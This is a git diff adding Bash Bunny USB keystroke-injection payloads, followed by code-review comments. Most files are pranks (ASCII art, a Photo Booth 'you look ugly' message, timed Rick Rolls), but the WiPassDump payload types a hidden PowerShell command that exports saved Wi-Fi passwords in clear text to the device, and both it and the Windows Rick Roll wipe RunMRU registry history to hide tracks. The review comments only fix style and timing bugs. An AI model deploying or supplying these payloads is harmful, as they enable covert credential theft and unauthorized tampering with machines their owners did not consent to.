diff --git a/payloads/library/Pranks/Ascii-Prank/art b/payloads/library/Pranks/Ascii-Prank/art new file mode 100755 index 00000000..e43717b3 --- /dev/null +++ b/payloads/library/Pranks/Ascii-Prank/art @@ -0,0 +1,22 @@ + __ /^\ + .' \ / :.\ + / \ | :: \ + / /. \ / ::: | + | |::. \ / :::'/ + | / \::. | / :::'/ + `--` \' `~~~ ':'/` + / ( + / 0 _ 0 \ + \/ \_/ \/ + -== '.' | '.' ==- + /\ '-^-' /\ + \ _ _ / + .-`-((\o/))-`-. + _ / //^\\ \ _ +."o".( , .:::. , )."o". +|o o\\ \:::::/ //o o| + \ \\ |:::::| // / + \ \\__/:::::\__// / + \ .:.\ `':::'` /.:. / + \':: |_ _| ::'/ + `---` `"""""` `---` diff --git a/payloads/library/Pranks/Ascii-Prank/payload.txt b/payloads/library/Pranks/Ascii-Prank/payload.txt new file mode 100755 index 00000000..944e61bb --- /dev/null +++ b/payloads/library/Pranks/Ascii-Prank/payload.txt @@ -0,0 +1,17 @@ +ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E + +LED R 300 + +Q GUI SPACE +Q DELAY 200 +Q STRING terminal +Q DELAY 400 +Q ENTER +Q DELAY 400 +Q GUI N +Q DELAY 100 +Q STRING cat /Volumes/BashBunny/payloads/switch2/art +Q DELAY 100 +Q ENTER + +LED G diff --git a/payloads/library/Pranks/Photo-Booth-Ugly-Prank/README.md b/payloads/library/Pranks/Photo-Booth-Ugly-Prank/README.md new file mode 100644 index 00000000..ef34ae56 --- /dev/null +++ b/payloads/library/Pranks/Photo-Booth-Ugly-Prank/README.md @@ -0,0 +1,25 @@ +# Photo booth ugly prank for Bash Bunny + +* Author: Jafahulo +* Version: Version 1.0 +* Target: OSX + +## Description + +Quick payload that takes a photo of target, and tells them that they're ugly + +REQUIRES THE BASH BUNNY TO BE PLUGGED IN THE FULL TIME + +## Configuration + +None needed + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Red (blinking) | Running | +| Green | Attack Complete | + +## Discussion +none 
diff --git a/payloads/library/Pranks/Photo-Booth-Ugly-Prank/payload.txt b/payloads/library/Pranks/Photo-Booth-Ugly-Prank/payload.txt new file mode 100755 index 00000000..f9828c91 --- /dev/null +++ b/payloads/library/Pranks/Photo-Booth-Ugly-Prank/payload.txt @@ -0,0 +1,77 @@ +ATTACKMODE HID VID_0X05AC PID_0X021E + +LED R 200 + +Q DELAY 1000 +Q GUI SPACE +Q DELAY 100 +Q STRING photo booth +Q DELAY 300 +Q ENTER +Q DELAY 3500 +Q ENTER +Q DELAY 500 +Q GUI 1 +Q DELAY 5000 +Q GUI SPACE +Q DELAY 100 +Q STRING textEdit +Q DELAY 100 +Q ENTER +Q DELAY 1000 +Q GUI N +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI + +Q GUI B +Q STRING saaaayyyy You look ugly! +Q DELAY 100 +Q ENTER + +LED G diff --git a/payloads/library/Pranks/UnifiedRickRoll/README.md b/payloads/library/Pranks/UnifiedRickRoll/README.md new file mode 100644 index 00000000..ba34acda --- /dev/null +++ b/payloads/library/Pranks/UnifiedRickRoll/README.md @@ -0,0 +1,22 @@ +# UnifiedRickRoll for Bash Bunny + +* Author: Jafahulo +* Version: Version 1.0 +* Target: OSX + +## Description +Runs a script in background that will crank up volume and rick roll target at specified time. + +## Configuration + +set time to run in payload.txt + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Red (blinking) | Running | +| Green | Attack Complete | + +## Discussion +https://forums.hak5.org/index.php?/topic/40618-payload-unifiedrickroll/ 
diff --git a/payloads/library/Pranks/UnifiedRickRoll/payload.txt b/payloads/library/Pranks/UnifiedRickRoll/payload.txt new file mode 100755 index 00000000..c59d5611 --- /dev/null +++ b/payloads/library/Pranks/UnifiedRickRoll/payload.txt @@ -0,0 +1,24 @@ +ATTACKMODE HID VID_0X05AC PID_0X021E + +time=1734 + +LED R 200 + +Q GUI SPACE +Q DELAY 200 +Q STRING terminal +Q DELAY 100 +Q ENTER +Q DELAY 1000 +Q GUI n +Q DELAY 1000 + +Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while test \$hi == \'0\'\; do if [ \$ho == $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown + +# close up shop +Q DELAY 1000 +Q ENTER +Q GUI W +Q ENTER + +LED G diff --git a/payloads/library/Pranks/UnifiedRickRollWindows/README.md b/payloads/library/Pranks/UnifiedRickRollWindows/README.md new file mode 100644 index 00000000..4c707d06 --- /dev/null +++ b/payloads/library/Pranks/UnifiedRickRollWindows/README.md 
@@ -0,0 +1,38 @@ +# UnifiedRickRoll for Bash Bunny + +* Author: Jafahulo +* Version: Version 1.0 +* Target: Windows + +## Description +Runs a script in background that will crank up volume and rick roll target at specified time. Also removes 'run' diologue history to "hide" tracks + +The format for the time is as follows: How many hours have passed since midnight + how many minutes have passed since that hour started. + + + +As an example: 1:39am would be 139, 1:39pm would be 1339 (it's in 24 hour format, not 12), 5:03pm would be 173, and 5:02am would be 52. + + + +This is kinda confusing at first, but if you tinker with it for a couple minutes, it's pretty easy to figure out. + +Additionally, you can run this in any powershell window, and it will set the current time in that format to $time: + +$time=(Get-Date).Hour.toString()+(Get-Date).Minute.toString() + + +## Configuration + +set time to run in payload.txt + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Red (blinking) | Running | +| Blue (blinking) | Cleaning up +| Green | Attack Complete | + +## Discussion +https://forums.hak5.org/index.php?/topic/40621-payload-unifiedrickrollwindows/ diff --git a/payloads/library/Pranks/UnifiedRickRollWindows/payload.txt b/payloads/library/Pranks/UnifiedRickRollWindows/payload.txt new file mode 100755 index 00000000..e6804ef8 --- /dev/null +++ b/payloads/library/Pranks/UnifiedRickRollWindows/payload.txt 
@@ -0,0 +1,34 @@ +ATTACKMODE HID VID_0X05AC PID_0X021E + +#Use format described in the readme +time=1051 + +#run payload + +LED R 200 + +Q GUI r + +Q DELAY 200 + +Q STRING cmd -A '/t:fe /k mode con: lines=1 cols=15' +Q DELAY 200 +Q ENTER +Q DELAY 500 +Q STRING powershell -NoP -NonI -W Hidden -Exec Bypass \$hi=0\; \$ho=\(Get-Date\).Hour.toString\(\)\; while \(\$hi -eq \'0\'\) \{ if \(\$ho -eq $time \) \{\$vol=new-object -com wscript.shell\; For\(\$i=0\; \$i -le 50\; \$i\+\+\)\{\$vol.SendKeys\(\[char\]175\)\}\; start \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; \$hi=1\; \} \$ho=\(Get-Date\).Hour.toString\(\)\+\(Get-Date\).Minute.toString\(\)\;\} + + + +Q DELAY 500 + +Q ENTER + +#Hide tracks +LED B 500 + + QUACK GUI r + QUACK DELAY 1000 + QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" + QUACK ENTER + +LED G diff --git a/payloads/library/WiPassDump/a.cmd b/payloads/library/WiPassDump/a.cmd deleted file mode 100644 index 858b01e0..00000000 --- a/payloads/library/WiPassDump/a.cmd +++ /dev/null @@ -1,6 +0,0 @@ -REM Go to dump directory -cd /d %~dp0 -cd ../../loot/WiPassDump/ - -REM Dump saved Wi-Fi infos -netsh wlan export profile key=clear \ No newline at end of file diff --git a/payloads/library/WiPassDump/payload.txt b/payloads/library/WiPassDump/payload.txt old mode 100644 new mode 100755 index c141d948..0339e924 --- a/payloads/library/WiPassDump/payload.txt +++ b/payloads/library/WiPassDump/payload.txt 
@@ -1,56 +1,55 @@ -#!/bin/bash -# -# Title: WiPassDump -# Author: samdeg555 -# Version: 1.0 -# Target: Windows -# -# Runs powershell as Administrator -# Bypasses UAC -# Dumps cleartext Wi-Fi passwords and infos to the Bash Bunny -# - -LED R 200 - -# Create directory to dump infos -mkdir -p /root/udisk/loot/WiPassDump - -# Source bunny_helpers.sh to get environment variable SWITCH_POSITION -source bunny_helpers.sh - -# Set language accordingly -Q SET_LANGUAGE ca - -ATTACKMODE HID STORAGE - -LED B 200 - -# Launch powershell as admin -Q GUI r -Q DELAY 100 -Q STRING powershell Start-Process powershell -Verb runAs -Q ENTER - -# Bypass UAC -Q DELAY 3000 -Q ALT o -Q ENTER -Q DELAY 500 - -# Start a.cmd -Q STRING '.((gwmi win32_volume -f '"'"'label='"''"'BashBunny'"'''"').Name+'"'"'payloads/' -Q STRING $SWITCH_POSITION -Q STRING '/a.cmd'"'"')' -Q ENTER - -# Wait for a.cmd to finish and exit - -LED R B 500 - -Q DELAY 3000 -Q STRING exit -Q ENTER - -sync - -LED G +# Title: WiPassDump +# Author: jafahulo -- Cred: samdeg555, hak5darren +# Version: 2.0 +# Target: Windows +# +# Runs powershell script to dump clear text passwords to \loot\WiPassDump +# Runs powershell script to remove "run" prompt history - creds for this go to hak5darren. +# +# Red Blinking..........Running +# Blue Blinking.........Removing tracks +# Green.................Finished +################################################ + +ATTACKMODE HID STORAGE + +# Create directory under loot to store passwords in +mkdir -p /root/udisk/loot/WiPassDump + +LED R 200 + +# Open windows run console + +Q GUI r +Q DELAY 1000 + +# enter payload and execute + +Q STRING powershell -WindowStyle Hidden \$bunny\=\(gwmi win32_volume -f \'label=\\\"BashBunny\\\"\'\).NAME\; cd \$bunny\\loot\\WiPassDump\; netsh wlan export profile key=clear +Q ENTER + +#Let code run, then sync + +Q DELAY 5000 + +sync + +# Wait for misc. 
to happen on computer + +Q DELAY 1000 + +# Hide tracks + +LED B 500 + + QUACK GUI r + QUACK DELAY 1000 + QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" + QUACK ENTER + +QUACK DELAY 1000 + +# Done! + +LED G + diff --git a/payloads/library/WiPassDump/readme.md b/payloads/library/WiPassDump/readme.md index 72412ab6..988dde13 100644 --- a/payloads/library/WiPassDump/readme.md +++ b/payloads/library/WiPassDump/readme.md @@ -1,26 +1,24 @@ -# WiPassDump for Bash Bunnys - -* Author: samdeg555 -* Version: Version 1.0 -* Target: Windows - -## Description - -Dumps saved Wi-Fi infos including clear text passwords to the bash bunny -Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder. - -## Configuration - -None needed. - -## STATUS - -| LED | Status | -| ------------------ | -------------------------------------------- | -| Red (blinking) | Setting up | -| Blue (blinking) | Attack running | -| Purple (blinking) | Almost done (cleaning up) | -| Green | Attack Complete | - -## Discussion -None yet. +# WiPassDump for Bash Bunnys + +* Author: Jafahulo --creds: samdeg555, hak5darren +* Version: Version 2.0 +* Target: Windows + +## Description + +Dumps saved Wi-Fi infos including clear text passwords to the bash bunny +Saves to the loot folder on the Bash Bunny USB Mass Storage partition in WiPassDump folder. + +## Configuration + +None needed. + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Red (blinking) | Running | +| Green | Attack Complete | + +## Discussion +None yet.
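Review bot: In Ascii-Prank/payload.txt the typed command hardcodes the switch directory (`cat /Volumes/BashBunny/payloads/switch2/art`), so the payload only works when installed in switch2. The previous WiPassDump payload in this same patch sourced `bunny_helpers.sh` and used `$SWITCH_POSITION` for this; doing the same here would make the path follow the switch. This payload also ships without a README or a Title/Author/Target header, unlike the other payloads added in the patch.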
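Review bot: In Photo-Booth-Ugly-Prank/payload.txt the long run of identical `Q GUI +` lines between `Q GUI N` and `Q GUI B` has no comment saying what it is for and no delay between keystrokes. Since payload.txt is run as a shell script, a short `for` loop with a one-line comment would say the same thing in three lines and make the repeat count easy to change. The fixed waits (`Q DELAY 3500`, `Q DELAY 5000`) also carry the whole timing assumption and deserve a comment stating what they wait for.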
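Review bot: In UnifiedRickRoll/payload.txt the comparison `[ \$ho == $time ]` matches `time` against the output of `date '+%H%M'`, which is always four zero-padded digits, but neither the payload nor the README states that. A value such as 905 for 9:05 would never match. Please document the format next to `time=1734` (for example "24-hour HHMM, zero-padded, e.g. 0905") and in the README's Configuration section, which currently only says "set time to run in payload.txt".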
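Review bot: The time format described in UnifiedRickRollWindows/README.md is ambiguous because hour and minute are concatenated without padding: 1:11 and 11:01 both produce 111, so the payload fires at whichever comes first. A zero-padded value from `Get-Date -Format HHmm` would remove the ambiguity and match the format the OSX payload compares against; the helper line `$time=(Get-Date).Hour.toString()+(Get-Date).Minute.toString()` and the payload comparison would need to change together. Separately, the STATUS table row `| Blue (blinking) | Cleaning up` is missing its closing `|`.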
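Review bot: In UnifiedRickRollWindows/payload.txt the loop variable is initialised inconsistently: `$ho=(Get-Date).Hour.toString()` holds only the hour on the first pass, while inside the loop it is reassigned to hour plus minute, so the first comparison against `$time` is made against a different format than every later one. Initialise it with the same expression used in the loop. The `while ($hi -eq '0')` loop also has no pause, unlike the OSX version's `sleep 1`, so it spins continuously until the target time; a `Start-Sleep -Seconds 1` inside the loop would avoid that. The file also mixes `Q` and indented `QUACK` for the same command.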
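Review bot: WiPassDump/payload.txt drops the `#!/bin/bash` line while the file mode changes from 100644 to 100755, which leaves an executable script with no interpreter line; either keep the shebang or leave the mode alone. The removal of `Q SET_LANGUAGE ca` is not mentioned in the header, so the keyboard layout the payload now assumes should be stated in a comment. The comment "Wait for misc. to happen on computer" does not say what the extra `Q DELAY 1000` is waiting for, and the cleanup section switches from `Q` to indented `QUACK` for no visible reason.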
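Review bot: The STATUS table in WiPassDump/readme.md no longer matches the payload: the new payload.txt sets `LED B 500` during its "Hide tracks" step and its own header lists "Blue Blinking.........Removing tracks", but the README table now shows only Red and Green. The Description should also state that the payload deletes every value under the user's `RunMRU` key (`-Name '*'`), since that changes the target's registry beyond the Wi-Fi export the README describes.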